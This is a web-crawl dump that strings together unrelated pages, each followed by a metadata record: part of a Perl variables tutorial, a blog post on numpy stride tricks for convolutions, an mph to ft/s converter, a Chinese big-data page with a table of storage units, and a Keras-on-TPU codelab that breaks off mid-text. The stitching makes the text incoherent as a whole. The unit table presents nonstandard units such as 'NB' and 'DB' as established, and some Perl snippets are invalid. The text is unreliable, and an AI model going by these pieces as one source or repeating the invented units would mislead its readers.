1], [1, 0] ]; # an arrayref of arrayrefs\n# There is no namespace conflict between scalars, arrays and hashes\n# so @matrix and \$matrix _both_ exist at this point and hold different values.\n\nmy @diagonal_1 = (\$matrix[0]->[0], \$matrix[1]->[1]); # uses @matrix\nmy @diagonal_2 = (\$matrix->[0]->[0], \$matrix->[1]->[1]); # uses \$matrix\n# Since chained []- and {}-access can only happen on references, you can\n# omit some of those arrows.\nmy \$corner_1 = \$matrix[0][1]; # uses @matrix\nmy \$corner_2 = \$matrix->[0][1]; # uses \$matrix\n``````\n\nWhen used as booleans, references are always true.\n\n## Hash References\n\nHash references are scalars which contain a pointer to the memory location containing the data of a hash. 
Because the scalar points directly to the hash itself, when it is passed to a subroutine, changes made to the hash are not local to the subroutine as with a regular hash, but instead are global.\n\nFirst, let's examine what happens when you pass a normal hash to a subroutine and modify it there:\n\n``````use strict;\nuse warnings;\nuse Data::Dumper;\n\nsub modify\n{\nmy %hash = @_;\n\n\$hash{new_value} = 2;\n\nprint Dumper(\"Within the subroutine\");\nprint Dumper(\\%hash);\n\nreturn;\n}\n\nmy %example_hash = (\nold_value => 1,\n);\n\nmodify(%example_hash);\n\nprint Dumper(\"After exiting the subroutine\");\nprint Dumper(\\%example_hash);\n``````\n\nWhich results in:\n\n``````\$VAR1 = 'Within the subroutine';\n\$VAR1 = {\n'new_value' => 2,\n'old_value' => 1\n};\n\$VAR1 = 'After exiting the subroutine';\n\$VAR1 = {\n'old_value' => 1\n};\n``````\n\nNotice that after we exit the subroutine, the hash remains unaltered; all changes to it were local to the modify subroutine, because we passed a copy of the hash, not the hash itself.\n\nIn comparison, when you pass a hashref, you are passing the address of the original hash, so any changes made within the subroutine will be made to the original hash:\n\n``````use strict;\nuse warnings;\nuse Data::Dumper;\n\nsub modify\n{\nmy \$hashref = shift;\n\n# De-reference the hash to add a new value\n\$hashref->{new_value} = 2;\n\nprint Dumper(\"Within the subroutine\");\nprint Dumper(\$hashref);\n\nreturn;\n}\n\n# Create a hashref\nmy \$example_ref = {\nold_value => 1,\n};\n\n# Pass a hashref to a subroutine\nmodify(\$example_ref);\n\nprint Dumper(\"After exiting the subroutine\");\nprint Dumper(\$example_ref);\n``````\n\nThis will result in:\n\n``````\$VAR1 = 'Within the subroutine';\n\$VAR1 = {\n'new_value' => 2,\n'old_value' => 1\n};\n\$VAR1 = 'After exiting the subroutine';\n\$VAR1 = {\n'new_value' => 2,\n'old_value' => 1\n};\n``````\n\n## Typeglobs, typeglob refs, filehandles and constants\n\nA typeglob `*foo` holds references to the contents of global variables with that name: `\$foo`, `@foo`, `%foo`, `&foo`, etc. You can access it like a hash and assign to it to manipulate the symbol table directly (evil!).\n\n``````use v5.10; # necessary for say\nour \$foo = \"bar\";\nour \$bar;\nsay ref *foo{SCALAR}; # SCALAR\nsay \${ *foo{SCALAR} }; # bar\n*bar = *foo;\nsay \$bar; # bar\n\$bar = 'egg';\nsay \$foo; # egg\n``````\n\nTypeglobs are more commonly handled when dealing with files. 
`open`, for example, produces a reference to a typeglob when asked to create a non-global filehandle:\n\n``````use v5.10; # necessary for say\nopen(my \$log, '>:encoding(UTF-8)', '/tmp/log') or die \$!; # open for writing with encoding\nsay \$log 'Log opened';\n\n# You can dereference this globref, but it's not very useful.\nsay ref \$log; # GLOB\nsay (*{\$log}->{IO} // 'undef'); # undef\n\nclose \$log or die \$!;\n``````\n\nTypeglobs can also be used to make global read-only variables, though `use constant` is in broader use.\n\n``````# Global constant creation\n*TRUE = \\('1');\nour \$TRUE;\nsay \$TRUE; # 1\n\$TRUE = ''; # dies, \"Modification of a read-only value attempted\"\n\n# use constant instead defines a parameterless function, therefore it's not global,\n# can be used without sigils, can be imported, but does not interpolate easily.\nuse constant (FALSE => 0);\nsay FALSE; # 0\nsay &FALSE; # 0\nsay \"\${\\FALSE}\"; # 0 (ugh)\nsay *FALSE{CODE}; # CODE(0xMA1DBABE)\n\n# Of course, neither is truly constant when you can manipulate the symbol table...\n*TRUE = \\('');\nuse constant (EVIL => 1);\n*FALSE = *EVIL;\n``````\n\n## Sigils\n\nPerl has a number of sigils:\n\n``````\$scalar = 1; # individual value\n@array = ( 1, 2, 3, 4, 5 ); # sequence of values\n%hash = ('it', 'ciao', 'en', 'hello', 'fr', 'salut'); # unordered key-value pairs\n&function('arguments'); # subroutine\n*typeglob; # symbol table entry\n``````\n\nThese look like sigils, but aren't:\n\n``````\\@array; # \\ returns the reference of what's on the right (so, a reference to @array)\n\$#array; # this is the index of the last element of @array\n``````\n\nYou can use braces after the sigil if you should be so inclined. Occasionally, this improves readability.\n\n``````say \${value} = 5;\n``````\n\nWhile you use different sigils to define variables of different types, the same variable can be accessed in different ways based on what sigils you use.\n\n``````%hash; # we use % because we are looking at an entire hash\n\$hash{it}; # we want a single value, however, that's singular, so we use \$\n\$array[0]; # likewise for an array. notice the change in brackets.\n@array[0,3]; # we want multiple values of an array, so we instead use @\n@hash{'it','en'}; # similarly for hashes (this gives the values: 'ciao', 'hello')\n%hash{'it','fr'}; # we want a hash with just some of the keys, so we use %\n# (this gives key-value pairs: 'it', 'ciao', 'fr', 'salut')\n``````\n\nThis is especially true of references. In order to use a referenced value you can combine sigils together.\n\n``````my @array = 1..5; # This is an array\nmy \$reference_to_an_array = \\@array; # A reference to an array is a singular value\npush @array, 6; # push expects an array\npush @\$reference_to_an_array, 7; # the @ sigil means what's on the right is an array\n# and what's on the right is \$reference_to_an_array\n# hence: first a @, then a \$\n``````\n\nHere's a perhaps less confusing way to think about it. As we saw earlier, you can use braces to wrap what's on the right of a sigil. 
So you can think of `@{}` as something that takes an array reference and gives you the referenced array.\n\n``````# pop does not like array references\npop \$reference_to_an_array; # ERROR in Perl 5.20+\n# but if we use @{}, then...\npop @{ \$reference_to_an_array }; # this works!\n``````\n\nAs it turns out, `@{}` actually accepts an expression:\n\n``````my \$values = undef;\nsay pop @{ \$values }; # ERROR: can't use undef as an array reference\nsay pop @{ \$values // [5] }; # undef // [5] gives [5], so this prints 5\n``````\n\n...and the same trick works for other sigils, too.\n\n``````# This is not an example of good Perl. It is merely a demonstration of this language feature\nmy \$hashref = undef;\nfor my \$key ( %{ \$hashref // {} } ) {\n\"This doesn't crash\";\n}\n``````\n\n...but if the \"argument\" to a sigil is simple, you can leave the braces out.\n\n``````say \$\$scalar_reference;\nsay pop @\$array_reference;\nfor keys (%\$hash_reference) { ... };\n``````\n\nThings can get excessively extravagant. This works, but please Perl responsibly.\n\n``````my %hash = (it => 'ciao', en => 'hi', fr => 'salut');\nmy \$reference = \\%hash;\nmy \$reference_to_a_reference = \\\$reference;\n\nmy \$italian = \$hash{it}; # Direct access\nmy @greets = @\$reference{'it', 'en'}; # Dereference, then access as a slice\nmy %subhash = %\$\$reference_to_a_reference{'en', 'fr'}; # Dereference ×2 then access as hash\n``````\n\nFor most normal use, you can just use subroutine names without a sigil. (Names without a sigil are typically called \"barewords\".) The `&` sigil is only useful in a limited number of cases.\n\n• Making a reference to a subroutine:\n\n``````sub many_bars { 'bar' x \$_[0] }\nmy \$reference = \\&many_bars;\nsay \$reference->(3); # barbarbar\n``````\n• Calling a function ignoring its prototype.\n\n• Combined with goto, as a slightly weird function call that has the current call frame replaced with the caller. Think of the Linux `exec()` API call, but for functions." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7386265,"math_prob":0.54935396,"size":18250,"snap":"2021-04-2021-17","text_gpt3_token_len":5070,"char_repetition_ratio":0.12627426,"word_repetition_ratio":0.03949447,"special_character_ratio":0.31375343,"punctuation_ratio":0.17363253,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9633976,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-18T12:28:30Z\",\"WARC-Record-ID\":\"<urn:uuid:6cfcedf1-77dd-4c90-b27a-b60a0fa46286>\",\"Content-Length\":\"57233\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:46a87d24-4bd5-43fb-9ad3-7603590f128e>\",\"WARC-Concurrent-To\":\"<urn:uuid:f1141cd1-9edd-418a-a9a9-929e23d1676a>\",\"WARC-IP-Address\":\"172.67.206.98\",\"WARC-Target-URI\":\"https://sodocumentation.net/perl/topic/1566/variables\",\"WARC-Payload-Digest\":\"sha1:FY4FLKTSGAK6DX2NCLQABGWBB5LYRP2W\",\"WARC-Block-Digest\":\"sha1:6V5GPTQZDJOSWNPRC7IEC5YZEVRVAKKY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038476606.60_warc_CC-MAIN-20210418103545-20210418133545-00442.warc.gz\"}"}
https://jessicastringham.net/2017/12/31/stride-tricks/
[ "", null, "For an assignment on convolutional neural networks for deep learning practical, I needed to implement somewhat efficient convolutions. I learned about `numpy.stride_tricks` and `numpy.einsum` in the process and wanted to share it!\n\n• Part 1 is an introduction to the problem and how I used `numpy.lib.stride_tricks.as_strided`.\n• Part 2 is about `numpy.einsum`.\n\n## Introduction\n\nThe assignment was to classify handwritten characters using convolutional neural networks. For pedagogical reasons, I needed to implement convolutions.\n\nWe used the EMNIST dataset. Below is a sample of 40 example images from the dataset.", null, "The image below shows what happens when kernels are applied (convolved). The first row shows examples. The five bottom rows are the results of convolving each of five kernels, also known as the feature maps.", null, "Convolutional neural nets are pretty cool, but that’s all I’ll say about convolutional neural networks for now. For more information, check out cs231n.\n\n### Convolutions\n\nThe code I’m going to do in this series basically does the following (fyi: if you saw this earlier, I’ve edited it):\n\nThere are a couple details on how kernels and inputs are flipped or padded (convolutions vs cross-correlations; forward propagation vs back propagation; dealing with edges), but I’ll assume inputs and kernel are already set up.\n\n### Kernels\n\nKernels have parameters describing how to weight each pixel. For example, below is a `3 x 3` kernel with 9 parameters:", null, "If my input was a `3 x 3` grayscale image, I could think of putting this kernel on top of the image and multiplying each kernel parameter by the corresponding input pixel value. The resulting feature map would be a single pixel containing the sum of all pixels.\n\nFor a larger image, convolutions are done by sliding the kernel over the image to create the feature map. Here’s the canonical image:", null, "Victor Powell’s post helped me understand image kernels.\n\n## Stride tricks\n\nA tricky part is telling `numpy` to slide the kernel across the inputs. One approach could be using the nested for-loops above, and classmates did have luck using for-loops with Numba. I wanted to see if I could do it with `numpy` and came across `as_strided`.\n\n`as_strided` tricks numpy into looking at the array data in memory in a new way.\n\nTo use `as_strided` in convolutions, I used `as_strided` to add two more dimensions the size of the kernel. I also reduced the first two dimensions so that they were the size of the resulting feature map. To use `as_strided` two additional arguments are needed: the shape of the resulting array and the strides to use.\n\n(An aside, these high-dimensional matrices is called a tensor, as in TensorFlow.)\n\n### Shape\n\nThe way I think of this particular 4D tensor is a spreadsheet where each cell contains a little kernel-sized spreadsheet. If I looked at one cell of the outer spreadsheet, the kernel-sized spreadsheet should be the values that I multiply and sum with the kernel parameters to get the corresponding value in the feature map.\n\nOr, in an image", null, "By getting it into this form, I can use other functions to multiply and sum across dimensions.\n\n### Strides\n\nOne way to understand it is to imagine how a computer might store a 2D array in memory.\n\nFor a program to represent a 2D array, it fakes it. In the gif below, the left shows the faked array and the right shows an imagined memory representation. 
Moving left and right moves left or right, but moving up or down has to jump forward by the width.", null, "This is where `.strides` comes in handy. For example, when the array goes to print the next element to the right, I can tell it to jump forward as if it was moving down. If I do this correctly, I can produce the results above. That said, figuring out the strides parameter is one of the trickiest parts.\n\n#### Code\n\nPhew. Here’s some example code that does this:", null, "Next time, I’ll show how to use this to compute the feature map.\n\n### Final note: “This function has to be used with extreme care”\n\nAs the `as_strided` documentation says, “This function has to be used with extreme care”. I felt fine experimenting with it, because the code was not for production, and I had an idea of memory layouts. But I still messed up and it was interesting.\n\nAfter implementing convolutions, I decided to use `as_strided` to broadcast the bias term. However I forgot to update a variable, and it expanded a tiny test array into a much-too-large matrix. That resulted in it pulling garbage numbers out of other parts of memory! It would randomly add things like (10^300) to my convolutions!\n\nOne thing I’m learning in machine learning is that when things are horribly broken, they can still seem to work but with a tiny bit lower performance than expected. This was one of those cases.\n\nI didn’t realize something bad was happening and thought it was just that CNN’s are harder to train. I ended up getting it to train with a sigmoid non-linearity, with okay but not great performance.\n\nFor fun, here’s what the filters looked like:", null, "" ]
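The stride-tricks write-up above only preserves its example code as an image, so nothing runnable survives in the text. As a hedged sketch of the technique it describes (not the author's own code), the snippet below builds the 4D sliding-window view with `numpy.lib.stride_tricks.as_strided` and then multiplies-and-sums it against a kernel with `numpy.einsum`; the function name, array sizes, and the "valid"-padding choice are illustrative assumptions.

```python
import numpy as np
from numpy.lib.stride_tricks import as_strided

def conv2d_valid(image, kernel):
    # "Valid" 2D cross-correlation via a strided sliding-window view.
    # image: (H, W), kernel: (kh, kw); both 2D, single channel for simplicity.
    H, W = image.shape
    kh, kw = kernel.shape
    out_h, out_w = H - kh + 1, W - kw + 1
    # 4D view: an (out_h, out_w) grid of kernel-sized (kh, kw) windows.
    # The outer dimensions reuse the image's own row/column strides, so no data is copied.
    windows = as_strided(
        image,
        shape=(out_h, out_w, kh, kw),
        strides=image.strides + image.strides,
    )
    # Weight each window by the kernel and sum it down to one output pixel.
    return np.einsum('ijkl,kl->ij', windows, kernel)

img = np.arange(36, dtype=float).reshape(6, 6)
k = np.full((3, 3), 1 / 9.0)          # simple averaging kernel
print(conv2d_valid(img, k).shape)     # (4, 4)
```

As the post warns, `as_strided` reads whatever memory the strides point at, so getting `shape` or `strides` wrong silently produces garbage values rather than an error.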
[ null, "https://jessicastringham.net/assets/2017-12-31-strided.gif", null, "https://jessicastringham.net/assets/2017-12-31-eminst.png", null, "https://jessicastringham.net/assets/2017-12-31-filters.png", null, "https://jessicastringham.net/assets/2017-12-31-params.png", null, "https://jessicastringham.net/assets/2017-12-31-convolution.gif", null, "https://jessicastringham.net/assets/2017-12-31-strided.gif", null, "https://jessicastringham.net/assets/2017-12-31-strided-intro.gif", null, "https://jessicastringham.net/assets/2017-12-31-result.png", null, "https://jessicastringham.net/assets/2017-12-31-bad-filters.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8931598,"math_prob":0.7502433,"size":5263,"snap":"2021-31-2021-39","text_gpt3_token_len":1196,"char_repetition_ratio":0.10952652,"word_repetition_ratio":0.015572859,"special_character_ratio":0.21356641,"punctuation_ratio":0.11619048,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9861038,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,6,null,3,null,3,null,5,null,3,null,6,null,3,null,5,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-20T08:45:19Z\",\"WARC-Record-ID\":\"<urn:uuid:6dcc0c2b-90fd-4d52-9040-8ee8135ef814>\",\"Content-Length\":\"18049\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b65438aa-606f-4402-9c99-6c9fb39cc455>\",\"WARC-Concurrent-To\":\"<urn:uuid:c494b91d-9fb5-43a1-811e-464af1f0d0bd>\",\"WARC-IP-Address\":\"208.113.160.68\",\"WARC-Target-URI\":\"https://jessicastringham.net/2017/12/31/stride-tricks/\",\"WARC-Payload-Digest\":\"sha1:OCMF2H74WMGDD5IJICXXXQNC662SG75N\",\"WARC-Block-Digest\":\"sha1:NYUTSBU2LW4VHWBYCRAJGXVHAGTIIFLM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057033.33_warc_CC-MAIN-20210920070754-20210920100754-00352.warc.gz\"}"}
https://calcresource.com/conv-mph-ftps.html
[ "## Mph - ft/s Converter\n\nEnter the speed in either of the next two fields and get it converted instantly!\n\n Miles per hour [mph]: Feet per second [ft/s]:\n\n## Definitions\n\n### Miles per hour\n\nMile per hour is a unit of speed defined in the Imperial and US customary systems of units. It measures the number of miles an object travels within an hour. International mile [mi] is a unit of length, equal to 5280 feet and precisely defined as 1609.344 meters. The symbol more commonly used on signs and labels is the abbreviation mph, however in science and engineering contexts, mi/h may be more convenient for unit arithmetic.\n\nThe relationships between the miles per hour and some other speed units, native to the Imperial/US customary and SI systems, are shown in the following table:\n\n### Feet per second\n\nFoot per second is a unit of speed defined in the Imperial and US customary systems of units. It measures the number of feet an object travels within a second. Foot [ft] is a unit of length, precisely defined as equal to 0.3048 meters.\n\nThe relationships between the foot per second and some other speed units, native to the Imperial/US customary and SI systems, are shown in the following table:\n\n### How to convert miles per hour to feet per second\n\n• Multiply speed in mph with 5280\n• Divide the result by 3600\n• The result is the speed in feet per second\n\nFor example 60 mph is: 60x5280/3600 = 88 fps\n\n### How to convert feet per second to miles per hour\n\n• Multiply speed in fps with 3600\n• Divide the result by 5280\n• The result is the speed in mph\n\nFor example 99 fps is: 99*3600/5280 = 67.5 mph\n\n### Conversion table from [mph] to [fps]\n\nIn the following table some typical speeds in miles per hour are converted to feet per second:\n\n### Conversion table from [fps] to [mph]\n\nIn the following table some typical speeds in feet per second are converted to miles per hour:" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73253924,"math_prob":0.9406977,"size":2689,"snap":"2023-14-2023-23","text_gpt3_token_len":941,"char_repetition_ratio":0.15791434,"word_repetition_ratio":0.28333333,"special_character_ratio":0.38229826,"punctuation_ratio":0.101200685,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9915401,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-01T05:59:54Z\",\"WARC-Record-ID\":\"<urn:uuid:e8f7d4e9-d188-428d-b4a8-5e387b92e4a7>\",\"Content-Length\":\"76429\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b09fd9a9-b72a-49d5-af32-291a34a1420c>\",\"WARC-Concurrent-To\":\"<urn:uuid:cf73a55d-24bf-4ba4-9668-41e97cee7fdc>\",\"WARC-IP-Address\":\"165.227.124.9\",\"WARC-Target-URI\":\"https://calcresource.com/conv-mph-ftps.html\",\"WARC-Payload-Digest\":\"sha1:YZYBGEDRPJFV7FBHX633EOF4IWL573F7\",\"WARC-Block-Digest\":\"sha1:SDEIIVYP6L4KOVIXG2ZSPKDKJANFJR7D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224647614.56_warc_CC-MAIN-20230601042457-20230601072457-00240.warc.gz\"}"}
https://www.haogeee.com/article/a13/84.html
[ "", null, "5V特点:大量、高速、多样、价值、真实性\n\n1 Byte =8 bit\n\n1 KB = 1,024 Bytes = 8192 bit\n\n1 MB = 1,024 KB = 1,048,576 Bytes\n\n1 GB = 1,024 MB = 1,048,576 KB\n\n1 TB = 1,024 GB = 1,048,576 MB\n\n1 PB = 1,024 TB = 1,048,576 GB\n\n1 EB = 1,024 PB = 1,048,576 TB\n\n1 ZB = 1,024 EB = 1,048,576 PB\n\n1 YB = 1,024 ZB = 1,048,576 EB\n\n1 BB = 1,024 YB = 1,048,576 ZB\n\n1 NB = 1,024 BB = 1,048,576 YB\n\n1 DB = 1,024 NB = 1,048,576 BB\n\n1 Bit(比特) =Binary Digit\n\n8 Bits = 1 Byte(字节)\n\n1,000 Bytes = 1 Kilobyte\n\n1,000 Kilobytes = 1 Megabyte\n\n1,000 Megabytes = 1 Gigabyte\n\n1,000 Gigabytes = 1Terabyte\n\n1,000 Terabytes = 1 Petabyte\n\n1,000 Petabytes = 1 Exabyte\n\n1,000Exabytes = 1 Zettabyte\n\n1,000 Zettabytes = 1 Yottabyte\n\n1,000 Yottabytes = 1Brontobyte\n\n1,000 Brontobytes = 1 Geopbyte\n\n(1)对大量消费者提供产品或服务的企业可以利用大数据进行精准营销;\n\n(2)做小而美模式的中小微企业可以利用大数据做服务转型;\n\n(3)面临互联网压力之下必须转型的传统企业需要与时俱进充分利用大数据的价值。" ]
[ null, "https://www.haogeee.com/uploads/allimg/20200727/1-200HG2535S20.jpg", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.89999074,"math_prob":0.9999883,"size":1978,"snap":"2021-43-2021-49","text_gpt3_token_len":1531,"char_repetition_ratio":0.17882472,"word_repetition_ratio":0.0,"special_character_ratio":0.32709807,"punctuation_ratio":0.12569833,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97036326,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-16T14:54:00Z\",\"WARC-Record-ID\":\"<urn:uuid:c548ee44-fb4d-47f2-9735-c578ed645f29>\",\"Content-Length\":\"24086\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0ae877dc-d8c7-447a-8847-854af0c4e410>\",\"WARC-Concurrent-To\":\"<urn:uuid:dd034d62-2dab-4bc7-bb95-f8cb756e4987>\",\"WARC-IP-Address\":\"150.138.249.223\",\"WARC-Target-URI\":\"https://www.haogeee.com/article/a13/84.html\",\"WARC-Payload-Digest\":\"sha1:P54XCNK4YEKD3LH7R4VM27O7MHWW7K4O\",\"WARC-Block-Digest\":\"sha1:XG2WO4YE3HDY4U4EPYTOLMGZWHUGR7BZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323584886.5_warc_CC-MAIN-20211016135542-20211016165542-00409.warc.gz\"}"}
https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/index.html?index=..%2F..index
[ "In this lab, you will learn about modern convolutional architecture and use your knowledge to implement a simple but effective convnet called \"squeezenet\".\n\nThis lab includes the necessary theoretical explanations about convolutional neural networks and is a good starting point for developers learning about deep learning.\n\nThis lab is Part 4 of the \"Keras on TPU\" series. You can do them in the following order or independently.", null, "### What you'll learn\n\n• To master the Keras functional style\n• To build a squeezenet architecture\n• To use TPUs in order to train fast and iterate on your architecture.\n\n### Feedback\n\nIf you see something amiss in this code lab, please tell us. Feedback can be provided through GitHub issues [feedback link].\n\nThis lab uses Google Collaboratory and requires no setup on your part. You can run it from a Chromebook. You can open this sample notebook and run through a couple of cells to familiarize yourself with Colaboratory.", null, "`Welcome to Colab.ipynb`\n\n## Select a TPU backend", null, "In the Colab menu, select Runtime > Change runtime type and then select TPU. In this code lab you will use a powerful TPU (Tensor Processing Unit) backed for hardware-accelerated training. Connection to the runtime will happen automatically on first execution, or you can use the \"Connect\" button in the upper-right corner.\n\n## Notebook execution", null, "Execute cells one at a time by clicking on a cell and using Shift-ENTER. You can also run the entire notebook with Runtime > Run all\n\n## Authentication", null, "Most code lab notebooks will ask you to authenticate with your Google account on first execution. This allows the Colab backend to access any cloud resources where logged-in access is necessary. Watch out for the prompt in \"Colab auth\" cells.", null, "All notebooks have a table of contents. You can open it using the black arrow on the left.\n\n## Hidden cells", null, "Some cells will only show their title. This is a Colab-specific notebook feature. You can double click on them to see the code inside but it is usually not very interesting. Typically support or visualization functions. You still need to run these cells for the functions inside to be defined.\n\n## In a nutshell", null, "The code for training a model on TPU in Keras is:\n\n``````tpu = tf.contrib.cluster_resolver.TPUClusterResolver(TPU_ADDRESS)\nstrategy = tf.contrib.tpu.TPUDistributionStrategy(tpu)\ntpu_model = tf.contrib.tpu.keras_to_tpu_model(model, strategy=strategy)\n\ntpu_model.fit(get_training_dataset,\nsteps_per_epoch=TRAIN_STEPS, epochs=EPOCHS,\nvalidation_data=get_validation_dataset, validation_steps=VALID_STEPS)``````\n\nWe will use TPUs today to build and optimize a flower classifier at interactive speeds (minutes per training run).", null, "## Why TPUs ?\n\nModern GPUs are organized around programmable \"cores\", a very flexible architecture that allows them to handle a variety of tasks such as 3D rendering, deep learning, physical simulations, etc.. TPUs on the other hand pair a classic vector processor with a dedicated matrix multiply unit and excel at any task where large matrix multiplications dominate, such as neural networks.", null, "Illustration: a dense neural network layer as a matrix multiplication, with a batch of eight images processed through the neural network at once. Please run through one line x column multiplication to verify that it is indeed doing a weighted sum of all the pixels values of an image. 
Convolutional layers can be represented as matrix multiplications too although it's a bit more complicated (explanation here, in section 1).\n\n## The hardware\n\n### MXU and VPU\n\nA TPU v2 core is made of a Matrix Multiply Unit (MXU) which runs matrix multiplications and a Vector Processing Unit (VPU) for all other tasks such as activations, softmax, etc. The VPU handles float32 and int32 computations. The MXU on the other hand operates in a mixed precision 16-32 bit floating point format.\n\n### Mixed precision floating point and bfloat16\n\nThe MXU computes matrix multiplications using bfloat16 inputs and float32 outputs. Intermediate accumulations are performed in float32 precision.", null, "Neural network training is typically resistant to the noise introduced by a reduced floating point precision. There are cases where noise even helps the optimizer converge. 16-bit floating point precision has traditionally been used to accelerate computations but float16 and float32 formats have very different ranges. Reducing the precision from float32 to float16 usually results in over and underflows. Solutions exist but additional work is typically required to make float16 work.\n\nThat is why Google introduced the bfloat16 format in TPUs. bfloat16 is a truncated float32 with exactly the same exponent bits and range as float32. This, added to the fact that TPUs compute matrix multiplications in mixed precision with bfloat16 inputs but float32 outputs, means that, typically, no code changes are necessary to benefit from the performance gains of reduced precision.\n\n### Systolic array\n\nThe MXU implements matrix multiplications in hardware using a so-called \"systolic array\" architecture in which data elements flow through an array of hardware computation units. (In medicine, \"systolic\" refers to heart contractions and blood flow, here to the flow of data.)\n\nThe basic element of a matrix multiplication is a dot product between a line from one matrix and a column from the other matrix (see illustration at the top of this section). For a matrix multiplication Y=X*W, one element of the result would be:\n\n`Y[2,0] = X[2,0]*W[0,0] + X[2,1]*W[1,0] + X[2,2]*W[2,0] + ... + X[2,n]*W[n,0]`\n\nOn a GPU, one would program this dot product into a GPU \"core\" and then execute it on as many \"cores\" as are available in parallel to try and compute every value of the resulting matrix at once. If the resulting matrix is 128x128 large, that would require 128x128=16K \"cores\" to be available which is typically not possible. The largest GPUs have around 4000 cores. A TPU on the other hand uses the bare minimum of hardware for the compute units in the MXU: just `bfloat16 x bfloat16 => float32` multiply-accumulators, nothing else. These are so small that a TPU can implement 16K of them in a 128x128 MXU and process this matrix multiplication in one go.", null, "Illustration: the MXU systolic array. The compute elements are multiply-accumulators. The values of one matrix are loaded into the array (red dots). Values of the other matrix flow through the array (grey dots). Vertical lines propagate the values up. Horizontal lines propagate partial sums. It is left as an exercise to the user to verify that as the data flows through the array, you get the result of the matrix multiplication coming out of the right side.\n\nIn addition to that, while the dot products are being computed in an MXU, intermediate sums just flow between adjacent compute units. 
They do not need to be stored and retrieved to/from memory or even a register file. The end result is that the TPU systolic array architecture has a significant density and power advantage, as well as a non-negligible speed advantage over a GPU, when computing matrix multiplications.\n\n### Cloud TPU\n\nWhen you request one \"Cloud TPU v2\" on Google Cloud Platform, you get a virtual machine (VM) which has a PCI-attached TPU board. The TPU board has four dual-core TPU chips. Each TPU core features a VPU (Vector Processing Unit) and a 128x128 MXU (MatriX multiply Unit). This \"Cloud TPU\" is then usually connected through the network to the VM that requested it. So the full picture looks like this:", null, "Illustration: your VM with a network-attached \"Cloud TPU\" accelerator. \"The Cloud TPU\" itself is made of a VM with a PCI-attached TPU board with four dual-core TPU chips on it.\n\n### TPU pods\n\nIn Google's data centers, TPUs are connected to a high-performance computing (HPC) interconnect which can make them appear as one very large accelerator. Google calls them pods and they can encompass up to 512 TPU v2 cores. TPU v3 pods are even more powerful.", null, "Illustration: a TPU v3 pod. TPU boards and racks connected through HPC interconnect.\n\nDuring training, gradients are exchanged between TPU cores using the all-reduce algorithm (good explanation of all-reduce here). The model being trained can take advantage of the hardware by training on large batch sizes.", null, "Illustration: synchronization of gradients during training using the all-reduce algorithm on Google TPU's 2-D toroidal mesh HPC network.\n\n## The software\n\n### Large batch size training\n\nThe ideal batch size for TPUs is 128 data items per TPU core but the hardware can already show good utilization from 8 data items per TPU core. Remember that one Cloud TPU has 8 cores.\n\nIn this code lab, we will be using the Keras API. In Keras, the batch size automatically becomes the per-core batch size when running on TPU. It is not something you need to adjust in your code, but under the hood, you will be training with an 8 times larger batch size.", null, "For additional performance tips see the TPU Performance Guide. For very large batch sizes, special care might be needed in some models, see LARSOptimizer for more details.\n\n### Under the hood: XLA\n\nTensorflow programs define computation graphs. The TPU does not directly run Python code, it runs the computation graph defined by your Tensorflow program. Under the hood, a compiler called XLA (accelerated Linear Algebra compiler) transforms the Tensorflow graph of computation nodes into TPU machine code. This compiler also performs many advanced optimizations on your code and your memory layout. The compilation happens automatically as work is sent to the TPU. You do not have to include XLA in your build chain explicitly.", null, "Illustration: to run on TPU, the computation graph defined by your Tensorflow program is first translated to an XLA (accelerated Linear Algebra compiler) representation, then compiled by XLA into TPU machine code.\n\n### Using TPUs in Keras\n\nTPUs are supported through the Keras API as of Tensorflow 1.12. Keras support is limited to 8 cores or one Cloud TPU for now. 
